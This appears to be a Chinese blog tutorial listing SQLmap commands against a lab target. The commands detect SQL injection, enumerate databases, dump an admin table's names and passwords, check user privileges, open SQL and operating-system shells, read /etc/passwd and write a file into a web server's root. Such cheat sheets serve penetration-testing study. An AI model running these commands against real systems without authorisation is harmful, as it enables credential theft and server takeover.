黑客教学之SQLmap-SQLmap介绍以及必备命令

163次阅读
没有评论

共计 1827 个字符,预计需要花费 5 分钟才能阅读完成。

SQLmap 是一种开源的渗透测试工具,主要用于检测和利用 SQL 注入漏洞。

它能够自动检测目标网站是否存在 SQL 注入漏洞,并通过利用这些漏洞来获取敏感信息、修改数据,甚至完全控制目标系统。

想要查看更多的命令可以参考用 ”sqlmap -hh” 查看完整的命令帮助文档。

一、Sqlmap 注入篇

1、检查注入点

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11

 

2、爆所有数据库信息

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs

 

爆当前数据库信息

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db

 

3、列出指定数据库所有的表名

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables

‘fujieace’ 为指定数据库名称

 

4、列出指定表名的所有列名

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns

‘admin’ 为指定表名称

 

5、dump 打印输出表名指定列名字段的值数据

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump

‘name,password’ 为指定字段名称

 

二、Sqlmap 用户权限篇

 

1、列出数据库管理系统用户:

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users

 

查看当前连接数据库用户:

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user

 

2、判断当前用户是否是 DBA?

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba

 

3、查看用户权限:

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace

 

三、Sqlmap 文件操作与 shell 提权篇

 

1、sql shell

这里通过 sqlmap 可以直接获取一个 sql shell,直接执行 sql 语句进行交互。

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();

 

注意:这里由于进入了 sql shell 可以执行 sql 语句了,也可以用 load data infile、load_file、into outfile 等函数来进行文件读取或写入;

 

2、cmd shell

这里通过 sqlmap 可以直接获取一个 cmd shell,直接执行 cmd 命令进行交互。

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig

 

3、读取服务器上指定文件

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt

 

4、写入本地文件到服务器上

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt
正文完
 
丸趣
版权声明:本站原创文章,由 丸趣 2023-05-10发表,共计1827字。
转载说明:除特殊说明外本站除技术相关以外文章皆由网络搜集发布,转载请注明出处。
评论(没有评论)